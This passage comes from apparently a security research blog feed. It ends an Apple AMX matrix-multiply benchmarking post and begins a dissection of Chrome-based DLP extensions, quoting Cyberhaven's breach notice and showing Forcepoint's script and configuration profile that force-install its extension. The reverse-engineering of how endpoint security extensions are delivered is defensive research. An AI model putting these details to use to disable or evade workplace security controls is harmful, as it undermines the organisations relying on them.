                            kc_end - kc, <span class="hljs-number">32</span>, <span class="hljs-number">32</span>, N
                        );
                    }
                }
            }
        }
    }

    AMX_STOP();

    <span class="hljs-built_in">free</span>(packed_A);
    <span class="hljs-built_in">free</span>(packed_B);
}
</code></pre>
<div class="hn-table">
<table>
<thead>
<tr>
<td>N</td><td>GFLOP/s</td><td>mean(rt)</td><td>min(rt)</td><td>max(rt)</td></tr>
</thead>
<tbody>
<tr>
<td>64</td><td>636.304</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>128</td><td>1006.633</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>256</td><td>1182.901</td><td>0.00003</td><td>0.00003</td><td>0.00003</td></tr>
<tr>
<td>512</td><td>2178.736</td><td>0.00014</td><td>0.00012</td><td>0.00024</td></tr>
<tr>
<td>1024</td><td>2365.431</td><td>0.00090</td><td>0.00083</td><td>0.00108</td></tr>
<tr>
<td>2048</td><td>1737.817</td><td>0.01026</td><td>0.00990</td><td>0.01087</td></tr>
<tr>
<td>4096</td><td>1654.705</td><td>0.08087</td><td>0.07996</td><td>0.08243</td></tr>
<tr>
<td>8192</td><td>1566.844</td><td>0.71723</td><td>0.68770</td><td>0.72344</td></tr>
</tbody>
</table>
</div><p>At the smallest matrix size (N = 64), throughput is 636.304 GFLOP/s, but the run times (mean, min, max) all print as zero. At that rate a 64×64 multiply finishes in roughly a microsecond, which is below the five decimal places shown in the table, so these entries reflect the display precision rather than a meaningful measurement. As the matrix size increases, throughput climbs to a peak of 2365.431 GFLOP/s at N = 1024, which suggests that this implementation and its blocking parameters suit problem sizes around 1024 best. Beyond 1024 the throughput declines, likely because memory bandwidth and cache capacity can no longer keep pace with the demand for data.</p>
<p>The run times show how cost scales with matrix size. For small matrices the run time is negligible, but it grows quickly: the mean is 0.01026 seconds at N = 2048, 0.08087 seconds at N = 4096, and 0.71723 seconds at N = 8192. That is roughly an eight- to nine-fold increase per doubling of N, in line with the cubic growth in work for matrix multiplication.</p>
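<p>As a sanity check on the table, the throughput column can be reproduced from the run times. The sketch below assumes the benchmark counts the conventional 2·N³ floating-point operations for an N×N GEMM (an assumption, since the harness is not shown here), and <code>gemm_gflops</code> is a hypothetical helper name.</p>

```c
#include <stdint.h>

/* Hypothetical helper: GFLOP/s for a square N x N GEMM that took `seconds`.
 * Assumes the conventional 2 * N^3 operation count (one multiply and one
 * add per inner-product term); the real harness may count differently. */
static double gemm_gflops(uint64_t n, double seconds)
{
    double flops = 2.0 * (double)n * (double)n * (double)n;
    return flops / seconds / 1e9;
}
```

<p>For N = 1024 and the mean run time of 0.00090 s, this gives about 2386 GFLOP/s, close to the reported 2365.431. The small gap is consistent with the run time having been rounded to five decimals.</p>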
<h3 id="heading-interacting-with-apple-accelerate">Interacting with Apple Accelerate</h3>
<p>Apple’s Accelerate is a library for high-performance, energy-efficient computation on the CPU that leverages its vector-processing capabilities. The library contains functions for:</p>
<ul>
<li><p>Image processing, such as converting between formats and image manipulation (<strong>vImage</strong>)</p>
</li>
<li><p>Low-level routines for accelerating common linear algebra operations on matrices and vectors (<strong>BLAS</strong>)</p>
</li>
<li><p>Building and running neural networks for training and inference (<strong>BNNS</strong>, Basic Neural Network Subroutines)</p>
</li>
<li><p>Digital signal processing operations, such as FFTs and convolution, for audio, images, or any other signal (<strong>vDSP</strong>)</p>
</li>
<li><p>Routines for solving higher-level linear algebra problems, such as systems of linear equations or eigenvalue problems (<strong>LAPACK</strong>)</p>
</li>
</ul>
<p>In more common HPC circles, this would be equivalent to something like cuBLAS or cuSOLVER from NVIDIA. We can use this library by including <code>&lt;Accelerate/Accelerate.h&gt;</code> and linking against the framework with <code>-framework Accelerate</code>.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> once</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;Accelerate/Accelerate.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;vector&gt;</span></span>
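<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;algorithm&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;type_traits&gt;</span></span>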

<span class="hljs-keyword">template</span> &lt;<span class="hljs-keyword">typename</span> T&gt;
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">AccelerateGEMM</span> :</span> <span class="hljs-keyword">public</span> GEMM&lt;T&gt;
{
<span class="hljs-keyword">private</span>:
    <span class="hljs-keyword">size_t</span> n;
    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">vector</span>&lt;T&gt; a, b, c;

<span class="hljs-keyword">public</span>:
    <span class="hljs-function"><span class="hljs-keyword">explicit</span> <span class="hljs-title">AccelerateGEMM</span><span class="hljs-params">(<span class="hljs-keyword">size_t</span> n)</span> : <span class="hljs-title">n</span><span class="hljs-params">(n)</span>, <span class="hljs-title">a</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">b</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">c</span><span class="hljs-params">(n * n)</span> </span>{}

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-function"><span class="hljs-keyword">if</span> <span class="hljs-title">constexpr</span> <span class="hljs-params">(<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">float</span>&gt;)</span> </span>{
            cblas_sgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0f</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0f</span>, c.data(), n);
        } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">constexpr</span> (<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">double</span>&gt;) {
            cblas_dgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0</span>, c.data(), n);
        }
    }

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">init_matrices</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-built_in">std</span>::fill(a.begin(), a.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(b.begin(), b.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(c.begin(), c.end(), T(<span class="hljs-number">0</span>));
    }
};
</code></pre>
<div class="hn-table">
<table>
<thead>
<tr>
<td>N</td><td>GFLOP/s</td><td>mean(rt)</td><td>min(rt)</td><td>max(rt)</td></tr>
</thead>
<tbody>
<tr>
<td>64</td><td>699.051</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>128</td><td>1037.937</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>256</td><td>1233.211</td><td>0.00003</td><td>0.00003</td><td>0.00003</td></tr>
<tr>
<td>512</td><td>2274.877</td><td>0.00014</td><td>0.00012</td><td>0.00023</td></tr>
<tr>
<td>1024</td><td>2483.596</td><td>0.00088</td><td>0.00086</td><td>0.00093</td></tr>
<tr>
<td>2048</td><td>1787.963</td><td>0.01019</td><td>0.00961</td><td>0.01196</td></tr>
<tr>
<td>4096</td><td>1727.521</td><td>0.08243</td><td>0.07956</td><td>0.11510</td></tr>
<tr>
<td>8192</td><td>1628.371</td><td>0.70349</td><td>0.67522</td><td>0.77956</td></tr>
</tbody>
</table>
</div><p>The Accelerate framework vastly outperforms OpenBLAS for smaller matrix sizes. For instance, at N=64, Accelerate achieves 699 GFLOP/s, whereas OpenBLAS only achieves 79.6 GFLOP/s, a gap of roughly 9x. The gap persists up to N=512, where Accelerate records 2274 GFLOP/s compared to 371 GFLOP/s from OpenBLAS. The run times (mean, min, max) for Accelerate round to zero at the smallest sizes, showing that its AMX-backed routines handle small matrix operations very efficiently. In contrast, OpenBLAS has slightly larger run times, especially for N=128 and beyond.</p>
<p>At larger matrix sizes, the performance gap narrows somewhat, but Accelerate continues to outperform OpenBLAS. For instance, at N=1024, Accelerate reaches 2483 GFLOP/s, whereas OpenBLAS caps at 423 GFLOP/s. Run times for Accelerate remain competitive but grow as the matrix sizes increase. OpenBLAS exhibits much longer run times, especially at large matrix sizes (e.g., N=4096 and N=8192), where its mean run times are several times longer than Accelerate’s.</p>
<p>At the largest matrix size tested, N=8192, the performance difference shrinks further. Accelerate achieves 1628 GFLOP/s, while OpenBLAS achieves 574 GFLOP/s. This suggests that the efficiency of both libraries stabilizes at larger matrix sizes, though Accelerate is still around 3x faster. OpenBLAS shows significant increases in run time at these sizes, with mean run times exceeding 2.2 seconds, while Accelerate's mean run time is around 0.7 seconds.</p>
<h1 id="heading-why-did-apple-built-amx">Why Did Apple Build AMX?</h1>
<p>The fact of the matter is that Apple waited for SVE to mature before committing to it, and AMX was simply a stopgap solution to address the shortcomings of Arm NEON.</p>
<p>Many have critiqued NEON for various quirks. One of the more obscure but important critiques is its lack of generic shuffle instructions like those found in x86 SSE and AVX. On x86, shuffles are typically low-latency instructions. For instance, the <code>VSHUFPS</code> instruction, which <code>_mm256_shuffle_ps</code> maps to, has a latency of 1 cycle and a throughput of one instruction per cycle on many Intel architectures. The 128-bit SSE form of such a shuffle looks like this:</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;immintrin.h&gt;</span></span>

<span class="hljs-function">__m128 <span class="hljs-title">shuffle_sse</span><span class="hljs-params">(__m128 a, __m128 b)</span> </span>{
    <span class="hljs-keyword">return</span> _mm_shuffle_ps(a, b, _MM_SHUFFLE(<span class="hljs-number">3</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>));
}
</code></pre>
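<p>To make the immediate easier to read, here is a scalar model of what the shuffle selects. It is an illustrative sketch only: <code>shuffle_ps_model</code> and <code>SHUFFLE_IMM</code> are hypothetical names, and the model mirrors the documented lane-selection behaviour of <code>_mm_shuffle_ps</code> and the bit layout of <code>_MM_SHUFFLE</code>, not any particular implementation.</p>

```c
#include <stdint.h>

/* Same bit layout as the _MM_SHUFFLE(z, y, x, w) macro:
 * four 2-bit lane selectors packed into one byte. */
#define SHUFFLE_IMM(z, y, x, w) (((z) << 6) | ((y) << 4) | ((x) << 2) | (w))

/* Scalar reference model of a 4-lane float shuffle (illustrative only).
 * The two low selectors pick lanes from `a`, the two high selectors pick
 * lanes from `b`. `out` must not alias `a` or `b`. */
static void shuffle_ps_model(const float a[4], const float b[4],
                             uint8_t imm8, float out[4])
{
    out[0] = a[(imm8 >> 0) & 3];
    out[1] = a[(imm8 >> 2) & 3];
    out[2] = b[(imm8 >> 4) & 3];
    out[3] = b[(imm8 >> 6) & 3];
}
```

<p>With <code>SHUFFLE_IMM(3, 1, 2, 0)</code> the result is <code>{ a[0], a[2], b[1], b[3] }</code>, which is the arrangement any NEON port of <code>shuffle_sse</code> has to reproduce.</p>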
<p>Those who have ported AVX code to NEON, especially code that leans on shuffle instructions, often find that it means rethinking the data flow of the algorithm. Instead of relying on flexible, single-instruction shuffles, NEON code might use a combination of vector extracts, reverses, and interleaving operations to achieve the desired data arrangement.</p>
<p>The most straightforward way to do this in NEON might involve using a combination of <code>vgetq_lane_f32</code> to extract individual lanes, <code>vsetq_lane_f32</code> to set lanes, and <code>vcopyq_lane_f32</code> to move data between vectors. For broadcasting a single lane to all elements, <code>vdupq_lane_f32</code> can be used. However, this lane-by-lane approach can lead to suboptimal performance on ARM hardware.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;arm_neon.h&gt;</span></span>

<span class="hljs-comment">// Lane-by-lane build of { a[0], a[2], b[1], b[3] }, matching _MM_SHUFFLE(3, 1, 2, 0)</span>
<span class="hljs-function"><span class="hljs-keyword">float32x4_t</span> <span class="hljs-title">shuffle_neon</span><span class="hljs-params">(<span class="hljs-keyword">float32x4_t</span> a, <span class="hljs-keyword">float32x4_t</span> b)</span> </span>{
    <span class="hljs-keyword">float32x4_t</span> result = a;  <span class="hljs-comment">// lane 0 already holds a[0]</span>

    result = vsetq_lane_f32(vgetq_lane_f32(a, <span class="hljs-number">2</span>), result, <span class="hljs-number">1</span>);
    result = vsetq_lane_f32(vgetq_lane_f32(b, <span class="hljs-number">1</span>), result, <span class="hljs-number">2</span>);
    result = vsetq_lane_f32(vgetq_lane_f32(b, <span class="hljs-number">3</span>), result, <span class="hljs-number">3</span>);

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>To achieve better performance with NEON, programmers can use instructions that operate on multiple lanes at once. One such instruction is <code>vextq_f32</code>, which extracts a contiguous run of elements from two vectors, starting at a specified index. NEON also provides a family of reverse instructions, including <code>REV16</code>, <code>REV32</code>, and <code>REV64</code>, which efficiently reverse the order of elements within specific portions of a vector. While each of these instructions typically has a 2 cycle latency, they can potentially replace multiple lane-specific operations, leading to better overall performance.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;arm_neon.h&gt;</span></span>

<span class="hljs-comment">// One possible multi-lane formulation using the AArch64 unzip intrinsics</span>
<span class="hljs-comment">// (UZP1/UZP2): the same { a[0], a[2], b[1], b[3] } result without per-lane moves</span>
<span class="hljs-function"><span class="hljs-keyword">float32x4_t</span> <span class="hljs-title">shuffle_neon_uzp</span><span class="hljs-params">(<span class="hljs-keyword">float32x4_t</span> a, <span class="hljs-keyword">float32x4_t</span> b)</span> </span>{
    <span class="hljs-keyword">float32x4_t</span> even = vuzp1q_f32(a, b);  <span class="hljs-comment">// { a[0], a[2], b[0], b[2] }</span>
    <span class="hljs-keyword">float32x4_t</span> odd = vuzp2q_f32(a, b);   <span class="hljs-comment">// { a[1], a[3], b[1], b[3] }</span>

    <span class="hljs-comment">// Low half of the even lanes, high half of the odd lanes</span>
    <span class="hljs-keyword">return</span> vcombine_f32(vget_low_f32(even), vget_high_f32(odd));
}
</code></pre>
<p>Apple's AMX has an instruction called <a target="_blank" href="https://github.com/corsix/amx/blob/main/genlut.md">genlut</a>, which has two primary modes: lookup and generate. In lookup mode, it can perform operations similar to a combination of AVX512's <code>vpshufb</code> and <code>vgatherps</code> instructions. This allows for complex data rearrangement and gathering operations within a single instruction. The lookup mode supports various data types and lane counts, ranging from 8-bit to 64-bit elements, with lane counts varying from 8 to 64 depending on the data size.</p>
<p>The generate mode of Apple AMX's genlut instruction functions as an inverse operation to <code>vpshufb</code>, primarily used for quantization. In this mode, genlut reads a full 512-bit (64-byte) vector of data from the source and produces a packed vector of indices. The process involves searching the table register for each lane in the source vector. It finds the minimum value 'v' such that <code>table[v] &gt; source_lane</code>, and then writes the index value 'v - 1', or '-1' if no such 'v' is found.</p>
<p>This operation supports arbitrary 2, 3, 4, or 5-bit quantization, depending on the mode selected. Modes 0, 2, 3, and 5 perform 4-bit quantization, allowing for 16 levels, while modes 1, 4, and 6 use 5-bit quantization, providing 32 levels. The resulting quantized indices are densely packed into the low bytes of an X or Y register, with the remaining bytes cleared to zero. This packed result can be used directly in subsequent lookup operations, enabling efficient piecewise linear approximations of complex functions.</p>
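<p>The generate-mode search described above can be modeled in plain scalar C. This is only a reading aid under stated assumptions: float lanes, a caller-supplied ascending table, and the hypothetical function names <code>quantize_lane</code> and <code>quantize_lanes</code>. It follows the wording of the description and says nothing about how the hardware performs the search or packs the resulting indices.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Scalar model of the search as described in the text: find the smallest v
 * with table[v] > x and return v - 1, or -1 when no entry is greater than x.
 * Illustrative only; not the hardware algorithm. */
static int quantize_lane(const float *table, size_t table_len, float x)
{
    for (size_t v = 0; v < table_len; v++) {
        if (table[v] > x) {
            return (int)v - 1;
        }
    }
    return -1;
}

/* Apply the same search to every lane of a source vector. */
static void quantize_lanes(const float *table, size_t table_len,
                           const float *src, int *idx, size_t lanes)
{
    for (size_t i = 0; i < lanes; i++) {
        idx[i] = quantize_lane(table, table_len, src[i]);
    }
}
```

<p>With the table <code>{0, 1, 2, 3}</code>, an input of 1.5 maps to index 1, the bucket whose lower edge is 1. Note that in this model an input below <code>table[0]</code> and an input above every entry both produce -1, which follows directly from the rule as stated.</p>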
<h1 id="heading-the-future-of-amx">The Future of AMX</h1>
<p>Before Armv9 was even on the horizon, the usage of AMX itself was controversial. ARM typically does not allow custom ISA extensions. The main legal concern is that, while developers can use AMX, ARM might take issue if non-Apple entities start using it in production, potentially leading ARM to restrict future chip functionality.</p>
<p>AMX also introduces a new EL0 state, requiring changes to the ARM64 kernel’s context-switching mechanisms to handle additional register states. However, integrating these changes directly into the core ARM64 architecture code is complex and may not be welcomed upstream due to the proprietary nature of AMX and potential objections from ARM.</p>
<p>With the introduction of the Apple M4 chip, Apple finally adopted the Armv9 ISA, which also brings <a target="_blank" href="https://mastodon.social/@bshanks/112401605018159567">SVE support to Apple platforms</a>.</p>
]]></content:encoded></item><item><title><![CDATA[Behind Chrome-Based DLP Plugins]]></title><description><![CDATA[Cover Illustration by buruberrii_

While we discussed previously about how endpoint-based DLP/EDR agents work in macOS, there is another component of endpoint security systems that are often overlooked and that is the browser extension component. End...]]></description><link>https://research.meekolab.com/dissecting-chrome-based-dlp-plugins</link><guid isPermaLink="true">https://research.meekolab.com/dissecting-chrome-based-dlp-plugins</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Fri, 27 Dec 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1735658500209/312b88ff-b183-4d5c-9b8c-ef3139f7d426.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> buruberrii_</p>
</blockquote>
<p>While we previously discussed how <a target="_blank" href="https://research.meekolab.com/internals-of-macos-endpoint-security-products">endpoint-based DLP/EDR agents work in macOS</a>, another component of endpoint security systems is often overlooked: the browser extension. Endpoint security systems, especially DLPs, use the browser extension to intercept web traffic and inspect uploaded and downloaded files.</p>
<p>This came into focus unexpectedly with the news that Cyberhaven DLP’s Chrome Extension was compromised by a threat actor over the holidays.</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://twitter.com/cstanley/status/1872365853318225931">https://twitter.com/cstanley/status/1872365853318225931</a></div>
<p> </p>
<blockquote>
<p><strong>What happened?</strong></p>
<p>On December 24th, 2024, at approximately 5:24 PM UTC, a targeted advanced attack successfully occurred on a Cyberhaven employee. The attacker used the access gained in this attack to publish a malicious Chrome extension (version 24.10.4) to the Chrome Web Store in the early morning of December 25th, 2024.</p>
<p>Cyberhaven's internal security team detected the attack at 11:54 PM UTC on December 25th, 2024. Cyberhaven removed the malicious package within 60 minutes of detection.</p>
<p><strong>What was the impact?</strong></p>
<p>For browsers running the compromised plugin, it is possible for sensitive information, including authenticated sessions and cookies, to be exfiltrated to the attacker's domain (cyberhavenext[.]pro). The exfill domain was online from 1:32AM UTC December 25th, 2024 until 2:50AM UTC on December 26th, 2024.</p>
<p><strong>What we recommend on impacted endpoints</strong></p>
<ul>
<li>Verify that the impacted Cyberhaven Chrome extension version 24.10.4 is updated to 24.10.5 or newer</li>
<li>Revoke/rotate all passwords that aren't FIDOv2</li>
<li>Revoke/rotate all API tokens</li>
<li>Review all logs to verify no malicious activity</li>
<li>Versions not hosted on the Chrome store (Firefox, edge) were not affected</li>
</ul>
<p><strong>Next steps</strong></p>
<ul>
<li>Cyberhaven will continue its investigation into this incident and update its customers accordingly</li>
<li>We are working on providing additional telemetry and additional threat intelligence and will share it with impacted customers as soon as possible</li>
<li>Cyberhaven has engaged Mandiant and Federal Law Enforcement to help in this investigation</li>
</ul>
<p>One of Cyberhaven's core values is maximum transparency, and we are acting on these first principles to retain the trust we have earned from you. We will continue to keep you updated and support you in every way possible to mitigate the impact of this incident.</p>
<p><strong>Additional information about the incident:</strong></p>
<p>This incident only impacted machines running Chrome-based browsers that were updated via the Google Chrome Web Store.</p>
<p>After an in-depth review, the only compromise at Cyberhaven was a single admin account for the Google Chrome Store that allowed the attacker to push a malicious Chrome extension and bypass Cyberhaven controls; there was no other attack vector or any additional compromised accounts, including our CI/CD processes or code signing keys. The only impacted version of the plugin is 24.10.4. It only affected machines that were online between 1:32 AM UTC on December 25th, 2024 and 2:50 AM UTC on December 26th, 2024.</p>
<p>We know the attack did not clean up the Chrome data store, so we have included instructions below that your security teams can use to verify what if any, data was exfiltrated. Cyberhaven will be publishing a new Chrome extension (version 24.10.6) that will leverage this new information to gather additional telemetry to narrow down the scope of possible compromised machines; also, this data will allow us to narrow down the scope of possible compromised browsers and understand what if any, data was exfiltrated</p>
</blockquote>
<h1 id="heading-whats-a-dlp">What's a DLP?</h1>
<p>Data Loss Prevention (DLP) solutions are security tools that inspect data in-motion (network traffic), at-rest (stored data), and in-use (endpoint actions) to identify and control sensitive data movement based on predefined or custom policies. They operate at network, storage, and OS levels with capabilities for monitoring, blocking, decrypting, or quarantining data that matches sensitive patterns like PII, financial data, or intellectual property.</p>
<p>But why do DLPs need their own Chrome plugin? At a technical level, DLPs are similar to EDRs; the main difference is the ruleset they enforce. So why can’t they just use the agent they already have installed, which has root privileges and network monitoring capabilities anyway?</p>
<p>Modern web browsers like Chrome implement a multi-process security model in which renderer processes run in isolated sandboxes. The browser's own network stack handles complex protocols, TLS/SSL sessions, connection pooling, and resource prioritization independently of the operating system's network stack. As a result, traditional OS-level monitoring tools mostly see traffic that is already encrypted and cannot directly observe or control network operations within the browser.</p>
<p>DLP providers require Chrome extensions because they need privileged access to browser-specific APIs that can intercept and analyze data transfers before they enter the encrypted TLS tunnel. These extensions can tap into <code>chrome.webRequest</code>, <code>chrome.downloads</code>, <code>chrome.tabs</code>, and <code>chrome.storage</code> APIs, providing critical capabilities like pre-TLS content inspection, DOM access for monitoring form uploads, and context awareness to track the exact origin of data transfers. The extension model also gives DLP solutions direct access to browser events and the JavaScript runtime, enabling them to detect and analyze dynamic content uploads through modern web APIs.</p>
<p>While the threat of <a target="_blank" href="https://www.youtube.com/watch?v=KiE6VNjW8ic">malicious Chrome extensions</a> has been well known for quite some time, and sysadmins have mostly migrated to more secure Chrome deployments by limiting extension installation, I have always seen plugin-based DLP solutions like Cyberhaven, and in this instance Forcepoint, as a weak spot. These are highly privileged add-ons that are intended to be installed by sysadmins across a wide IT deployment, and they’re rarely audited beforehand because, of course, it's a security product; it's supposed to be intrusive.</p>
<p>As Chrome extensions operate cross-platform, the material presented here is relevant to both macOS and Windows installations. This post focuses on a specific Chromium extension-based implementation from Forcepoint Endpoint, but I expect other solutions to implement similar delivery and interception mechanisms.</p>
<h1 id="heading-delivery-method">Delivery Method</h1>
<p>While researching this issue, I found this <a target="_blank" href="https://liudanking.com/beautiful-life/remove-chrome-plugin-force-installed-by-enterprise-policy/">Chinese article</a> about how Forcepoint embeds its add-on into Chrome and Firefox, which I found unique. Despite being an old dissection of the delivery logic, the implementation it describes appears to remain the same today.</p>
<p>There is a bash script located in the main installation path for Forcepoint in <code>/Library/Application Support/Websense Endpoint/DLP</code>. This script checks whether Chrome is running and force-installs the add-on.</p>
<pre><code class="lang-bash"><span class="hljs-meta">#!/bin/bash</span>

CUT=<span class="hljs-string">"/usr/bin/cut"</span>
LSOF=<span class="hljs-string">"/usr/sbin/lsof"</span>
PS=<span class="hljs-string">"/bin/ps"</span>
PROFILES=<span class="hljs-string">"/usr/bin/profiles"</span>
GREP=<span class="hljs-string">"/usr/bin/grep"</span>

PIDS=`<span class="hljs-variable">$PS</span> -axc -o pid,<span class="hljs-built_in">command</span> | <span class="hljs-variable">$GREP</span> <span class="hljs-string">"Google Chrome"</span> | <span class="hljs-variable">$GREP</span> -v <span class="hljs-string">"Google Chrome Helper"</span> | <span class="hljs-variable">$CUT</span> -c 1-5`

LIBWEP_HOOKED=0
<span class="hljs-keyword">if</span> [ <span class="hljs-variable">${#PIDS[@]}</span> -gt 0 ]
<span class="hljs-keyword">then</span>
    <span class="hljs-keyword">for</span> pid <span class="hljs-keyword">in</span> <span class="hljs-variable">$PIDS</span>
    <span class="hljs-keyword">do</span>
        CNT=`<span class="hljs-string">"<span class="hljs-variable">$LSOF</span>"</span> -P -T -p <span class="hljs-variable">$pid</span> | grep libwep_chrome.dylib | wc -l`
        <span class="hljs-keyword">if</span> [ <span class="hljs-variable">$CNT</span> == 1 ]
        <span class="hljs-keyword">then</span>
            LIBWEP_HOOKED=1
        <span class="hljs-keyword">fi</span>
    <span class="hljs-keyword">done</span>
<span class="hljs-keyword">fi</span>

<span class="hljs-keyword">if</span> [ <span class="hljs-variable">$LIBWEP_HOOKED</span> == 1 ]
<span class="hljs-keyword">then</span>
    <span class="hljs-built_in">echo</span> <span class="hljs-string">"Configuring the chrome extension profile..."</span>
    <span class="hljs-variable">$PROFILES</span> -I -F <span class="hljs-string">"/Library/Application Support/Websense Endpoint/DLP/WebsenseEndpointExtension.config"</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>This script (<code>setup_chrome_ext.sh</code>) checks whether Google Chrome is running and whether a specific library, <code>libwep_chrome.dylib</code>, is loaded by any of the Chrome processes. It first defines the paths of the system utilities it needs (<code>cut</code>, <code>lsof</code>, <code>ps</code>, <code>profiles</code>, and <code>grep</code>), then uses <code>ps</code> and <code>grep</code> to collect the process IDs (PIDs) of Chrome processes, excluding the "Google Chrome Helper" processes.</p>
<p>For each Chrome PID, it uses <code>lsof</code> to check whether <code>libwep_chrome.dylib</code> is loaded. If the library is found in at least one Chrome process, the script treats Chrome as hooked by the endpoint agent and runs the <code>profiles</code> command with the <code>-I -F</code> options to install the configuration profile at <code>/Library/Application Support/Websense Endpoint/DLP/WebsenseEndpointExtension.config</code>.</p>
<pre><code class="lang-xml"><span class="hljs-meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-meta-keyword">plist</span> <span class="hljs-meta-keyword">PUBLIC</span> <span class="hljs-meta-string">"-//Apple//DTD PLIST 1.0//EN"</span> <span class="hljs-meta-string">"http://www.apple.com/DTDs/PropertyList-1.0.dtd"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">plist</span> <span class="hljs-attr">version</span>=<span class="hljs-string">"1.0"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadIdentifier<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>com.websense.WebsenseEndpointExtension<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadRemovalDisallowed<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">false</span> /&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadScope<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>System<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadType<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>Configuration<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadUUID<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>5A93F4FD-5894-4396-856C-0AD9A0537752<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadOrganization<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>Websense<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadVersion<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">integer</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-name">integer</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadDisplayName<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>WebsenseEndpoint<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadContent<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadType<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
